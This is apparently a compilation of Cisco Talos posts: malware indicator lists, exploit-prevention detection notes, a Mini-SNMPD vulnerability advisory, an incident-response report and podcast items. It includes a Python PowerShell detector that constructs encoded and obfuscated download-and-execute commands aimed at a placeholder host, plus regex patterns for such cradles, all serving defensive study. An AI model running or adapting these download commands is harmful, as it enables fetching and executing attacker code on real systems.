Local\{83B9D177-24D4-29BF-C0FB-035E7B3F2D46} | 12

Domain Names contacted by malware. Does not indicate maliciousness | Occurrences
gvjmoleiqx[.]com | 11
hjlxybnt[.]pw | 11
mxsffkacgxhb[.]in | 11
aqnwun[.]net | 11
sppja[.]net | 11
wkbbomuxzbhk[.]com | 11
ipfmg[.]pw | 11
tznyr[.]com | 11
tajlmh[.]com | 11
flphjxmni[.]com | 11
ezkdeavdhzte[.]com | 11
lmlnzwlwgn[.]com | 11
ebiodd[.]pw | 11
krbmzpx[.]com | 11
llqikewmnt[.]net | 11
lgniduzwgg[.]pw | 11
rdbaqoj[.]pw | 11
ljcpqydcptw[.]pw | 11
jaokwlaiwjx[.]in | 11
spiesfhvlq[.]in | 11
pewxbb[.]pw | 11
yabnl[.]in | 11
gejetvtxpjze[.]in | 11
qrqtmeuk[.]net | 11
wicxqfc[.]in | 11
*See JSON for more IOCs

Files and/or directories created | Occurrences
%TEMP%\fro.dfx | 12
%TEMP%\npsosm.pan | 12
\Documents and Settings\All Users\pxs\dvf.evp | 12
\Documents and Settings\All Users\pxs\pil.ohu | 12
%ProgramData%\ph | 12
%ProgramData%\ph\eqdw.dbc | 12
%ProgramData%\ph\fktiipx.ftf | 12
%TEMP%\gocf.ksv | 12
%TEMP%\kpqlnn.iuy | 12

File Hashes

0a32a31d2b9d356c8887506ac547d5f44cc34ab40d8549d3f79709a9fa84381c 14d5e17e32f558058739e0633b2e61851186500c0aa80967dac57968e018fe37 16b1ca029162ab6c4a241d60d2de8a015a8cd866f050b9847d228ab3ba0704ba 4019c94cf57c53ae814fe62f7aa804829a909d19c23922b60921f1418deb51e8 46eef4a7440acb228050b0ec2c4ba6c3e47d5e3f75a6f6bb184a946bd502ce66 4b3dead1bc0865f079731c4f7ce6e19487724e80b39ded94371c09edc6978a48 6c89b38394fbfdcc1766d401d0bf54281e7c4d47388e1a0c99c962655bc6fdb6 7878d706f9f3a683904db685ebe2b6ead7464ec142ef239f242e19ebe1a6fe67 8875970e47c112f058e29d254371350ce058376a791fd9fdabad2ab2ed8dc83c b79952df8a801d9a8619d1254a24bde3ce37ea8ebfd17ca8eb48bdd90b27b305 d1c1dcbee46d723b931f1a18ec83f5f22c515edfcdf4dcd9e04a9ab8f173b4d2 d9273903d761b64374ab16e83b854d412ac27983b95a908f52254992b6092903

Coverage

Product | Protection
AMP | This has coverage
Cloudlock | N/A
CWS | This has coverage
Email Security | This has coverage
Network Security | This has coverage
Stealthwatch | N/A
Stealthwatch Cloud | N/A
Threat Grid | This has coverage
Umbrella | This has coverage
WSA | This has coverage

Screenshots of Detection (images not reproduced here): AMP, ThreatGrid, Umbrella




Win.Packed.ZBot-7563206-1

Indicators of Compromise

Registry Keys | Occurrences
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS, Value Name: LoadAppInit_DLLs | 19
<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS NT\CURRENTVERSION\WINDOWS, Value Name: AppInit_DLLs | 19

Files and/or directories created | Occurrences
%System32%\Tasks\aybbmte | 19
%ProgramData%\Mozilla\thfirxd.exe | 19
%ProgramData%\Mozilla\lygbwac.dll | 19
%HOMEPATH%\APPLIC~1\Mozilla\kvlcuie.dll | 16
%HOMEPATH%\APPLIC~1\Mozilla\tfbkpde.exe | 16
%SystemRoot%\Tasks\kylaxsk.job | 16

File Hashes

32d3d77c246077febd6a51c1c4af6cd0ef6e991f9d058814670b4d9b1ffb5929 35dba41629d3ef8e563339fe6169c2ddd9c630667a60e90e50d4901ce0fb3114 47364b16ec0b8af99154c5afb4c55f758c5ffbdc19759c039195d0f630a9fddd 5a3bdec2815d798fed747fd136c383305614c2d708805f5b5100dccce12188d9 64d56df10e94e1fff9ba9592660193168dcaece38ec92682326f7e3a6302c2ca 6ddf8b1b3866f32e26e61bf68e33e74444b591dc64642afe1b842d86cfdf5b33 7319a595fc991cae27e5057bb14714efa68ad74456f8c7c6eedd23575f3c5a47 7dfbb5e40028da7c503344cd4630727b71448ce1bcb2b2164e3217652578e623 8b3a463fc845258b9a4f60f60e853243b748de58ad4758e167decbc22ffe80cb 8c5f9e03729e46d8feb08d5357f21e888f1c922fd13edd626b9e5fea5ade7876 908e06fa764660785cc8f7c02090cbc783b8c2824a2524caefdf26279bae831c b2e187349a3e50eb0e1252a242f65d675cae2e32d362c6025c8cc966922dbf63 cbf3982f100358e34b4c2dc2782886a76432f1dad59761f747c1e8bc10ccec8c d5125b8c5dffe7fa67289ca75fed8d237ba399c779032bef27326d59fc458754 d84cd0947dd7a4c73239b992173267907bdf55fc28976797d2af7ed300bfaf83 d9134462d8be534f26973c5e19767c3c745262573f294cef1ab3b917eb410f98 d9c47353ee4c964a9f2bc115c1d47d02b0219839dbeccc6a72ac5d2df0a6905a e032675300402235fcd213f5b6790097b430051353034d23cacf207a0f642647 f21985a67551565d464004a7661d21a29d1581157955349e9a04dea717ab23d5

Coverage

Product | Protection
AMP | This has coverage
Cloudlock | N/A
CWS | This has coverage
Email Security | This has coverage
Network Security | N/A
Stealthwatch | N/A
Stealthwatch Cloud | N/A
Threat Grid | This has coverage
Umbrella | N/A
WSA | N/A

Screenshots of Detection (images not reproduced here): AMP, ThreatGrid




PUA.Win.File.Dealply-7563212-0

Indicators of Compromise

IP Addresses contacted by malware. Does not indicate maliciousness | Occurrences
54[.]146[.]91[.]247 | 14
52[.]41[.]141[.]111 | 12
34[.]231[.]131[.]84 | 11
54[.]149[.]89[.]229 | 8
198[.]50[.]173[.]223 | 8
54[.]69[.]88[.]117 | 7
35[.]164[.]24[.]169 | 7
52[.]37[.]160[.]176 | 5
54[.]213[.]123[.]75 | 2
207[.]154[.]205[.]3 | 2
172[.]217[.]12[.]174 | 1
172[.]217[.]12[.]142 | 1
151[.]80[.]42[.]103 | 1
23[.]221[.]50[.]122 | 1
5[.]9[.]9[.]18 | 1
172[.]217[.]13[.]238 | 1
23[.]54[.]219[.]51 | 1
185[.]107[.]71[.]41 | 1
51[.]38[.]57[.]168 | 1
159[.]89[.]184[.]138 | 1
23[.]3[.]126[.]219 | 1
165[.]227[.]137[.]252 | 1
23[.]0[.]52[.]194 | 1
178[.]79[.]169[.]193 | 1
149[.]56[.]157[.]112 | 1
*See JSON for more IOCs

Domain Names contacted by malware. Does not indicate maliciousness | Occurrences
info[.]yidadaridap[.]com | 25
rp[.]yidadaridap[.]com | 25
sourceforge[.]net | 9
media[.]phpnuke[.]org | 8
os2[.]yidadaridap[.]com | 8
os[.]yidadaridap[.]com | 8
mydati[.]com | 3
schema[.]org | 2
www[.]gstatic[.]com | 1
market[.]android[.]com | 1
i[.]ytimg[.]com | 1
lh3[.]googleusercontent[.]com | 1
img-prod-cms-rt-microsoft-com[.]akamaized[.]net | 1
developer[.]android[.]com | 1
channel9[.]msdn[.]com | 1
store[.]office[.]com | 1
products[.]office[.]com | 1
assets[.]onestore[.]ms | 1
statics-marketingsites-wcus-ms-com[.]akamaized[.]net | 1
pf[.]benjaminstrahs[.]com | 1
www[.]deadpoolgame[.]com | 1
trials[.]dynamics[.]com | 1
www[.]azure[.]com | 1
www[.]befunky[.]com | 1
www[.]rockstargames[.]com | 1
*See JSON for more IOCs

Files and/or directories created | Occurrences
%TEMP%\in10F4BD16 | 25
%TEMP%\in10F4BD16\472F35C2.tmp | 25
%TEMP%\<random, matching '[A-F0-9]{8}'>.log | 25
%TEMP%\INH162~1\css\ie6_main.css | 24
%TEMP%\INH162~1\css\main.css | 24
%TEMP%\INH162~1\css\sdk-ui\browse.css | 24
%TEMP%\INH162~1\css\sdk-ui\button.css | 24
%TEMP%\INH162~1\css\sdk-ui\checkbox.css | 24
%TEMP%\INH162~1\css\sdk-ui\images\button-bg.png | 24
%TEMP%\INH162~1\css\sdk-ui\images\progress-bg-corner.png | 24
%TEMP%\INH162~1\css\sdk-ui\images\progress-bg.png | 24
%TEMP%\INH162~1\css\sdk-ui\images\progress-bg2.png | 24
%TEMP%\INH162~1\css\sdk-ui\progress-bar.css | 24
%TEMP%\INH162~1\csshover3.htc | 24
%TEMP%\INH162~1\images\BG.png | 24
%TEMP%\INH162~1\images\Button.png | 24
%TEMP%\INH162~1\images\Button_Hover.png | 24
%TEMP%\INH162~1\images\Close.png | 24
%TEMP%\INH162~1\images\Close_Hover.png | 24
%TEMP%\INH162~1\images\Icon_Generic.png | 24
%TEMP%\INH162~1\images\Loader.gif | 24
%TEMP%\INH162~1\images\Pause_Button.png | 24
%TEMP%\INH162~1\images\Progress.png | 24
%TEMP%\INH162~1\images\ProgressBar.png | 24
%TEMP%\INH162~1\images\Quick_Specs.png | 24
*See JSON for more IOCs

File Hashes

029c5f2c2dbec036f397cd9f0352c99b5518adb48e9e0c14479b1042de97a8e1 043768f5d9923ecd231657dd90b8c5557987c0a96dbb0e90366c64d62893911d 049576cad41dcdad343c0e1b724cdc9ff854ad7f519d02dff60f5e5e611d4e4b 10e6962923b5afccb804f0089fdcfc47d33f8006bdc6b806b6d954e8a9df2ac2 192426fc265d7bd4d385b3c5a983725a754927d65ebc62c3097b2f41f447e4fa 1c99f891424cb56a090d2e1eb5625db0786f04c6704c82532198024a63a7c50a 2a1a4e11fa18befb29b00399de5af5c17d1d62c361cf1ca0ea069041a79abc39 2fc2a60b7154f47293e51d82e49f8c467b0e61dfa308b1bc53496a885fe730a6 49c4f31b2aae590042eaf9822d3256471ba862a5d2de4b6e8c1c9ba7994f42cd 4e62b6d6df8e3c2b00e4c8769e50cd8a8649b050b99c21e86bff2a344b43ee0b 528941efc56008a7f2c96ebf3f48a27733d95cc3802e1047be791bf0b1524795 57ff8a4bb6c0ff378c413d8e671ac4df2a896124a2b8bfdd56778ec44ba9641e 5be89eb16dab481ea1fb47f9800113bda32e7242230937f9500ce5df602ae1dc 5e4c796fa1e9e895c559d56bf51378a5af8a1341c8a253b289cc97530b757dd7 62a0f3ce3d7b54ca3bd95ec76ab45c226dfbce40ac0743d2dc0d5c73288e6d13 69d1e5b5468e4d083b98f6ed1fc85b98154144286e659390f63a8ad4fee575e6 6acacd65413137480a9e3ee60aa2cb8be000e0e5fc5ff4af2e206d8fcaddb3cf 6cb2a0a139bd72d43509b892d108c93ecf4e1f24e8267ce3862fe48ca35f4447 72948fecb2e7925785c76419a7d94686b1fa4dc3b165607f4cdf28655d69c612 72d3672de410e718288fdb19a2ea817f303f7b68a3358e2b63c4c6c06e4ee6f6 88ccf70fd42ad193bb82044191e4a3cb7eda3b7af3a9a1034104fe5b99e43888 914573db0bfe9ccdf1a102828397523f3abac13a8859b13d743f15fa7de00096 948cb02c5eb1afade4086c04f3954748cd37707a1f44ba6854bd38258844cbec a0c5d45bb1b35ff2f76e4b96112de328d2bf0032a5fefa843a6be6c14cf96d0f ac927c4c24469eb1de203e32a56bce3a0fa4eca37b4388fd35e6be699f8dc7e7
*See JSON for more IOCs

Coverage

Product | Protection
AMP | This has coverage
Cloudlock | N/A
CWS | This has coverage
Email Security | This has coverage
Network Security | N/A
Stealthwatch | N/A
Stealthwatch Cloud | N/A
Threat Grid | This has coverage
Umbrella | N/A
WSA | N/A

Screenshots of Detection (images not reproduced here): AMP, ThreatGrid




Exploit Prevention

Cisco AMP for Endpoints protects users from a variety of malware functions with exploit prevention. Exploit prevention helps users defend endpoints from memory attacks commonly used by obfuscated malware and exploits. These exploits use certain features to bypass typical anti-virus software, but were blocked by AMP thanks to its advanced scanning capabilities, even protecting against zero-day vulnerabilities.
CVE-2019-0708 detected - (5959)
An attempt to exploit CVE-2019-0708 has been detected. The vulnerability, dubbed BlueKeep, is a heap memory corruption which can be triggered by sending a specially crafted Remote Desktop Protocol (RDP) request. Since this vulnerability can be triggered without authentication and allows remote code execution, it can be used by worms to spread automatically without human interaction.
Process hollowing detected - (313)
Process hollowing is a technique used by some programs to evade static analysis and file-based detection. In typical usage, the malware unpacks its obfuscated or encrypted payload into memory, then launches a legitimate program as a child process in a suspended state. Before the child runs, its original image is unmapped from memory and replaced with the unpacked payload, the main thread's context is pointed at the payload's entry point, and the process is resumed. The result is a process that keeps the legitimate name and on-disk image but executes the attacker's code.
Kovter injection detected - (220)
A process was injected into, most likely by an existing Kovter infection. Kovter is a click-fraud Trojan that can also act as an information stealer. Kovter is also fileless malware: the malicious DLL is stored inside the Windows registry and injected directly into memory using PowerShell. It can detect and report the use of monitoring software such as Wireshark and sandboxes to its C2. It spreads through malicious advertising and spam campaigns.
Gamarue malware detected - (188)
Gamarue is a family of malware that can download files and steal information from an infected system. Worm variants of the Gamarue family may spread by infecting USB drives or portable hard disks that have been plugged into a compromised system.
Installcore adware detected - (111)
InstallCore is an installer that bundles legitimate applications with offers for additional third-party applications that may be unwanted. The unwanted applications are often adware that displays advertising in the form of pop-ups or by injecting into browsers and adding or altering advertisements on web pages. Adware is known to sometimes download and install malware.
Excessively long PowerShell command detected - (84)
A PowerShell command with a very long command-line argument, which may indicate an obfuscated script, has been detected. PowerShell is an extensible Windows scripting language present by default on all supported versions of Windows. Malware authors use PowerShell in an attempt to evade security software or other monitoring that is not tuned to detect PowerShell-based threats.
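What a detector for this condition looks like in practice, as an added example that is not Talos or AMP code: the Python below inspects constructed process-creation events, flags PowerShell command lines over a length threshold, decodes -EncodedCommand arguments (base64 of UTF-16LE text, which is what makes encoded command lines so long) and scans both the raw and decoded text for the markers that usually accompany an obfuscated or staged script. The threshold value, the marker list, the sample events and the example.invalid download URL are all assumptions made for illustration, not values taken from the product.

```python
import base64
import re

# Constructed staged-download payload; example.invalid is a reserved name that never resolves.
STAGE1_PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage1.ps1')"
# PowerShell's -EncodedCommand takes base64 of UTF-16LE, not of UTF-8.
ENCODED_PAYLOAD = base64.b64encode(STAGE1_PAYLOAD.encode("utf-16le")).decode("ascii")


def _concat_chars(s):   # 'a'+'b'+'c' style string splitting
    return "+".join(f"'{c}'" for c in s)


def _char_casts(s):     # [char]97+[char]98 style string building
    return "+".join(f"[char]{ord(c)}" for c in s)


# Constructed: a long, obfuscated one-liner that never spells out IEX or DownloadString.
OBFUSCATED_CMDLINE = (
    'powershell.exe -NoP -NonI -W Hidden -c "'
    f"$i=({_concat_chars('IEX')});"
    f"$c=({_char_casts('New-Object System.Net.WebClient')});"
    f"$m=({_char_casts('DownloadString')});"
    f"$u=({_concat_chars('http://example.invalid/stage2.ps1')});"
    '&("$i") (&("$c"))."$m"($u)"'
)

PS_IMAGE = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
# Constructed process-creation events (Sysmon Event ID 1 style), not real telemetry.
PROCESS_EVENTS = [
    {"image": PS_IMAGE, "cmdline": r"powershell.exe -ExecutionPolicy Bypass -File C:\ops\rotate-logs.ps1"},
    {"image": PS_IMAGE, "cmdline": f"powershell.exe -nop -w hidden -enc {ENCODED_PAYLOAD}"},
    {"image": PS_IMAGE, "cmdline": OBFUSCATED_CMDLINE},
    {"image": r"C:\Windows\System32\notepad.exe", "cmdline": r"notepad.exe C:\notes.txt"},
]

PS_IMAGES = {"powershell.exe", "pwsh.exe", "powershell_ise.exe"}
LENGTH_THRESHOLD = 500   # assumed for the example; baseline your own environment first

# (name, pattern) pairs checked against the raw command line plus any decoded payload.
SUSPICIOUS = [
    ("invoke_expression", re.compile(r"\b(?:iex|invoke-expression)\b", re.I)),
    ("download_cradle", re.compile(r"downloadstring|downloadfile|invoke-webrequest|\biwr\b|net\.webclient", re.I)),
    ("hidden_window", re.compile(r"[-/]w(?:indowstyle)?\s+hidden", re.I)),
    ("no_profile", re.compile(r"[-/]no(?:p|profile)\b", re.I)),
    ("base64_in_script", re.compile(r"frombase64string", re.I)),
    ("string_concat_obfuscation", re.compile(r"(?:'[^']{1,4}'\s*\+\s*){3,}")),
    ("char_casts", re.compile(r"\[char\]\s*\d+", re.I)),
]


def find_encoded_command(cmdline):
    """Return the argument of -EncodedCommand (any unambiguous prefix, e.g. -e, -enc) or None."""
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        if len(tok) > 1 and tok[0] in "-/" and "encodedcommand".startswith(tok[1:].lower()):
            return tokens[i + 1]
    return None


def decode_encoded_command(b64):
    """Decode an -EncodedCommand argument; None if it is not valid base64 of UTF-16LE."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze(event):
    """Return {'image', 'findings', 'decoded'} for PowerShell events, None for anything else."""
    image_name = event["image"].rsplit("\\", 1)[-1].lower()
    if image_name not in PS_IMAGES:
        return None
    cmdline, findings, decoded = event["cmdline"], [], None
    if len(cmdline) > LENGTH_THRESHOLD:
        findings.append(f"long_command_line:{len(cmdline)}")
    b64 = find_encoded_command(cmdline)
    if b64 is not None:
        findings.append("encoded_command")
        decoded = decode_encoded_command(b64)
        if decoded is None:
            findings.append("undecodable_encoded_command")
    text = cmdline + ("\n" + decoded if decoded else "")
    findings.extend(name for name, rx in SUSPICIOUS if rx.search(text))
    return {"image": image_name, "findings": findings, "decoded": decoded}


def is_suspicious(result):
    """Length alone, an encoded command, or two or more markers is enough to escalate."""
    f = result["findings"]
    return any(x.startswith("long_command_line") for x in f) or "encoded_command" in f or len(f) >= 2


if __name__ == "__main__":
    for ev in PROCESS_EVENTS:
        r = analyze(ev)
        if r and is_suspicious(r):
            print(f"SUSPICIOUS {r['findings']}\n  {ev['cmdline'][:80]}...")
```

Two points worth noting. First, the decoded payload is the strongest signal: the third event shows why length and structure matter, since the script never contains the strings IEX or DownloadString and a string-match rule on the raw command line would miss it. Second, the length threshold needs a baseline before it is used for alerting; installers and configuration-management tooling legitimately produce long PowerShell command lines, which is exactly the noise an attacker counts on.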
Reverse http payload detected - (32)
An exploit payload intended to connect back to an attacker-controlled host over HTTP has been detected.
Atom Bombing code injection technique detected - (32)
A process created a suspicious Atom, which is indicative of a known process injection technique called Atom Bombing. Atoms are Windows identifiers that associate a string with a 16-bit integer. These Atoms are accessible across processes when placed in the global Atom table. Malware abuses this by storing shellcode as a global Atom, then queuing an Asynchronous Procedure Call (APC) in a target process that retrieves the Atom, which copies the shellcode into the target's memory; a further APC then executes it. The malware family Dridex is known to use Atom Bombing, but other threats may leverage it as well.
Dealply adware detected - (22)
DealPly is adware that claims to improve the user's online shopping experience. It is often bundled into otherwise legitimate installers and is difficult to uninstall. It creates pop-up advertisements and injects advertisements into web pages. Adware has also been known to download and install malware.
Corebot malware detected - (16)
Corebot is a Trojan with many capabilities found in other prominent families. It features a plugin system to enable it to load a variety of features from the C&C server at any time. Known plugins include RAT capabilities such as taking desktop screenshots, as well as being able to intercept and modify browser communications and steal data, especially data related to banking.

Beers with Talos Ep. #71: I Have the Power(Shell)


Beers with Talos (BWT) Podcast episode No. 71 is now available. Download this episode and subscribe to Beers with Talos:

If iTunes and Google Play aren't your thing, click here.

Recorded Jan. 17, 2020

PowerShell is a frequent flyer in security headlines, a powerful and oft-wielded tool for attackers and defenders alike. This episode takes a look at PowerShell and how to help ensure its security posture as an effective management tool. We also look at the missing-the-forest-for-the-trees concept behind being concerned about the latest shiny APT before all else.

The timeline:

  • 00:50 — Roundtable Q&A: Nigel questions Craig's mid-life crisis
  • 07:00 — PowerShell and being a master of your Windows universe
  • 13:15 — Using PowerShell with security in mind
  • 29:05 — Defense-in-depth (a fave topic): Strategy, not tactics, is how to defend against APTs
  • 44:00 — Closing thoughts and parting shots

Links and resources:

==========

Featuring: Craig Williams (@Security_Craig), Matt Olney (@kpyke) and Nigel Houghton (@EnglishLFC).
Hosted by Mitch Neff (@MitchNeff)

Subscribe via iTunes (and leave a review!)


Subscribe to the Threat Source newsletter


Give us your feedback and suggestions for topics: beerswithtalos@cisco.com

Talos Takes back with new episode, feed


By Jon Munshaw.

Talos Takes, our new bite-size podcast, is back with its own feed and a new show.

We first unveiled Talos Takes in early December, and took some time to develop a new Talos Podcasts page to accommodate Talos Takes and Beers with Talos. Now you have two Talos shows you can subscribe to!

We'll be adding Talos Takes to Apple Podcasts, Google Play and other services very soon. For now, you can check out our RSS feed and all episodes here.

Our newest episode focuses on password management, hosted by Nick Biasini and Earl Carter.

Vulnerability Spotlight: Denial-of-service, information leak bugs in Mini-SNMPD


Aleksandar Nikolic of Cisco Talos discovered these vulnerabilities. Blog by Jon Munshaw.

Multiple vulnerabilities exist in Mini-SNMPD, a lightweight implementation of a Simple Network Management Protocol (SNMP) server. An attacker can exploit these bugs by sending a specially crafted SNMP request to a vulnerable server. These vulnerabilities could lead to a variety of conditions, potentially resulting in the disclosure of sensitive information and a denial-of-service condition.

Mini-SNMPD's small code size and memory footprint make it especially suitable for small and embedded devices. It is used, for example, by several devices based on the OpenWrt project.

In accordance with our coordinated disclosure policy, Cisco Talos worked with Mini-SNMPD to ensure that these issues are resolved and that an update is available for affected customers. Talos also provided the patch for these issues.

Vulnerability details

Mini-SNMPD decode_cnt information leak vulnerability (TALOS-2020-0975/CVE-2020-6058)

An exploitable out-of-bounds read vulnerability exists in the way Mini-SNMPD version 1.4 parses incoming SNMP packets. A specially crafted SNMP request can trigger an out-of-bounds memory read, which can result in the disclosure of sensitive information or a denial of service. To trigger this vulnerability, an attacker needs to send a specially crafted packet to the vulnerable server.

Read the complete vulnerability advisory here for additional information.

Mini-SNMPD decode_int information leak vulnerability (TALOS-2020-0976/CVE-2020-6059)

An exploitable out-of-bounds read vulnerability exists in the way Mini-SNMPD version 1.4 parses incoming SNMP packets. A specially crafted SNMP request can trigger an out-of-bounds memory read, which can result in the disclosure of sensitive information or a denial of service. To trigger this vulnerability, an attacker needs to send a specially crafted packet to the vulnerable server.

Read the complete vulnerability advisory here for additional information.

Mini-SNMPD socket disconnect denial-of-service vulnerability (TALOS-2020-0977/CVE-2020-6060)

A stack buffer overflow vulnerability exists in the way Mini-SNMPD version 1.4 handles multiple connections. A specially timed sequence of SNMP connections can trigger a stack overflow, resulting in a denial of service. To trigger this vulnerability, an attacker needs only to initiate multiple connections to the server.

Read the complete vulnerability advisory here for additional information.
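Judging by the function names in the two advisory titles, both out-of-bounds reads sit in the code that turns a BER-encoded SNMP field into a number, and the fix for that class of bug is the same in each case: check the declared length of an element against the bytes actually left in the packet before reading them. The Python below is an added illustration of that check on a minimal SNMP BER decoder. It is not Mini-SNMPD's code (Mini-SNMPD is written in C); the function names, the size limits and the two constructed packets are assumptions made for the example.

```python
from typing import Tuple

# ASN.1/BER tags used by SNMPv1/v2c messages (assumed minimal subset).
SEQUENCE, INTEGER, OCTET_STRING, COUNTER32 = 0x30, 0x02, 0x04, 0x41


class BerError(ValueError):
    """Raised instead of reading past the end of the packet."""


def ber_length(buf: bytes, pos: int) -> Tuple[int, int]:
    """Decode a BER length at buf[pos]; return (length, position after it).
    Every byte consumed is checked against len(buf) before it is read."""
    if pos >= len(buf):
        raise BerError("length byte lies past end of packet")
    first = buf[pos]
    pos += 1
    if first < 0x80:                      # short form: one byte
        return first, pos
    n = first & 0x7F                      # long form: n length bytes follow
    if n == 0 or n > 4:                   # indefinite / absurd lengths rejected
        raise BerError("unsupported length encoding")
    if pos + n > len(buf):
        raise BerError("long-form length runs past end of packet")
    return int.from_bytes(buf[pos:pos + n], "big"), pos + n


def ber_tlv(buf: bytes, pos: int) -> Tuple[int, bytes, int]:
    """Return (tag, value bytes, position after the element)."""
    if pos >= len(buf):
        raise BerError("tag byte lies past end of packet")
    tag = buf[pos]
    length, pos = ber_length(buf, pos + 1)
    # This is the check a decoder with an out-of-bounds read is missing:
    # trust the declared length only if that many bytes really remain.
    if length > len(buf) - pos:
        raise BerError(f"declared length {length} exceeds {len(buf) - pos} remaining bytes")
    return tag, buf[pos:pos + length], pos + length


def ber_integer(value: bytes) -> int:
    """INTEGER: 1..4 bytes, two's complement (SNMP INTEGER is 32-bit)."""
    if not 1 <= len(value) <= 4:
        raise BerError("INTEGER must be 1 to 4 bytes")
    return int.from_bytes(value, "big", signed=True)


def ber_counter(value: bytes) -> int:
    """Counter32/Gauge32: unsigned 32-bit, so up to 5 bytes with a leading 0x00."""
    if not 1 <= len(value) <= 5:
        raise BerError("Counter32 must be 1 to 5 bytes")
    n = int.from_bytes(value, "big", signed=False)
    if n > 0xFFFFFFFF:
        raise BerError("Counter32 out of range")
    return n


def parse_snmp_header(packet: bytes) -> Tuple[int, str]:
    """Parse the outer SEQUENCE, the version INTEGER and the community OCTET STRING."""
    tag, body, _ = ber_tlv(packet, 0)
    if tag != SEQUENCE:
        raise BerError("message is not a SEQUENCE")
    tag, version, pos = ber_tlv(body, 0)
    if tag != INTEGER:
        raise BerError("version is not an INTEGER")
    tag, community, _ = ber_tlv(body, pos)
    if tag != OCTET_STRING:
        raise BerError("community is not an OCTET STRING")
    return ber_integer(version), community.decode("ascii", "replace")


def rejects(packet: bytes) -> bool:
    """True if the decoder refuses the packet instead of over-reading."""
    try:
        parse_snmp_header(packet)
    except BerError:
        return True
    return False


# Constructed packets (not captures from the advisories): a well-formed
# SNMPv1 header, and one whose community string claims 32 bytes when only
# 2 remain in the packet.
GOOD_PACKET = bytes.fromhex("300b0201000406" "7075626c6963")
CRAFTED_PACKET = bytes.fromhex("3007020100042070" "75")

if __name__ == "__main__":
    print(parse_snmp_header(GOOD_PACKET))            # (0, 'public')
    print(rejects(CRAFTED_PACKET))                    # True
    print(ber_counter(bytes.fromhex("00ffffffff")))   # 4294967295
```

In C the equivalent of the `length > len(buf) - pos` test is a comparison against the remaining buffer size before every memcpy or pointer advance; without it the crafted packet above makes the decoder copy 30 bytes of whatever follows the packet in memory, which is the information leak the advisories describe.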

Versions tested

Talos tested and confirmed that version 1.4 of Mini-SNMPD is affected by these vulnerabilities.

Coverage

The following SNORT® rules will detect exploitation attempts. Note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to your Firepower Management Center or Snort.org.

Snort Rules: 52836, 52837

Quarterly Report: Incident Response trends in fall 2019


By David Liebenberg and Kendall McKay.

While many Cisco Talos Incident Response (CTIR) engagements have shown similar patterns over the past two quarters, we’re seeing a dangerous trend emerge this winter. Threat actors are increasingly combining the exfiltration of sensitive data with data encryption, using both as levers to compel victims to pay.

Targeting

A wide variety of verticals were once again targeted, including media, government, healthcare, and manufacturing, with the latter representing the top vertical targeted. The number of engagements closed out was around the same as the previous quarter.

Threats

Although we observed some new trends this quarter, including an uptick in web application exploits, a website defacement incident, and some new evasive tactics, this quarter demonstrated the continued threat posed by Trickbot, especially when it is leveraged as a dropper for ransomware such as Ryuk. The top threats for fall 2019 remained Trickbot and Ryuk. In a typical engagement, the target would receive a phishing email with a malicious link or document attached that would lead to the victim downloading Trickbot. The adversaries would use Trickbot and open-source tools such as PowerShell, Empire, or BloodHound to profile the victim, eventually dropping Ryuk after some dwell time (in one engagement, this lasted up to nearly a year) and demanding a ransom.

We also observed an instance of threat actors using an unusual method to deploy Ryuk. Following a Trickbot infection, the adversaries deployed Ryuk throughout the Active Directory environment via a group policy object, whereas adversaries typically leverage PsExec to deploy the ransomware.

The top threats observed this quarter are relatively consistent with those from the last quarter, though the commodity trojan Emotet appeared much less frequently. In another change, we did not observe any incidents related to illicit cryptocurrency mining, though there was a reemergence in the winter. We did, however, observe some malware that we had not seen in the previous quarter, including infostealers like Lokibot and AveMaria, ASP web shells, and the Frenchy toolkit.

Initial Vectors

Phishing remained the top infection vector. CTIR also observed an uptick in web application exploitation, including the exploitation of newer vulnerabilities, such as in the Palo Alto GlobalProtect SSL VPN. We also observed a third-party compromise in which a target’s GitHub account was compromised and the attackers stole a stored Amazon Web Services Identity and Access Management (IAM) account.

Actions after compromise

Actions post-compromise remained consistent with last quarter, ranging from encrypting data to connecting to command-and-control and moving laterally throughout the victim network. We did observe defacement this quarter as well as an uptick in evasive actions.

Looking forward

Although this blog covers fall 2019, CTIR has observed initial indicators that suggest an evolution in threat actor behavior in winter 2019/2020: Ransomware actors have begun exfiltrating sensitive data from victim organizations and threatening to publish it if the ransom is not paid.

Talos observed this behavior in two separate engagements in the winter that were perpetrated by the same actor. In both incidents, the actor leveraged the offensive security tool Cobalt Strike to move through the network, enumerate systems and collect data. The actor then exfiltrated the data using PowerShell to connect to an FTP server, after which the adversary deployed Maze ransomware in the victim environment.

This same actor had been observed by other security researchers threatening to release sensitive information if the ransom was not paid, and in several instances, followed through on that threat. This represents a major and dangerous shift in ransomware actor behavior because exfiltration further compels victim organizations to pay the ransom and ensures a significant impact even if proper measures such as backing up important information are implemented. It also shows an advancement in victim profiling by the actors, who may believe that large enterprises will be more willing to pay to keep sensitive data from being published. There are indications that other threat actors are beginning to mimic this behavior.

CTIR will provide additional details on this new behavior in next quarter’s report.

Threat Source newsletter (Feb. 6, 2020)


Newsletter compiled by Jon Munshaw.

Welcome to this week’s Threat Source newsletter — the perfect place to get caught up on all things Talos from the past week.

There’s never been a better time to be into cyber security podcasts. Our Podcasts page on TalosIntelligence.com got a facelift this week to make room for our new show, Talos Takes. Now, Beers with Talos and Talos Takes live on the same page, where you can get caught up on your cyber news each week.

During each episode of Talos Takes, our researchers and analysts will boil down a complicated topic into a minutes-long explainer that everyone from your parents to the CEO of your company will understand. You can subscribe to Talos Takes on Apple Podcasts, Spotify, Stitcher and Pocket Casts.

As if that wasn’t enough, we also released a new Beers with Talos episode Friday, where the guys discuss why PowerShell has been so widely used in malware.

And, as always, we have the latest Threat Roundup where we go through the top threats we saw — and blocked — over the past week.

Upcoming public engagements

Event: A World of Threats: When DNS becomes the new weapon for governments at Swiss Cyber Security Days 
Location: Forum Fribourg, Granges-Paccot, Switzerland
Date: Feb. 12 - 13
Speakers: Paul Rascagnères
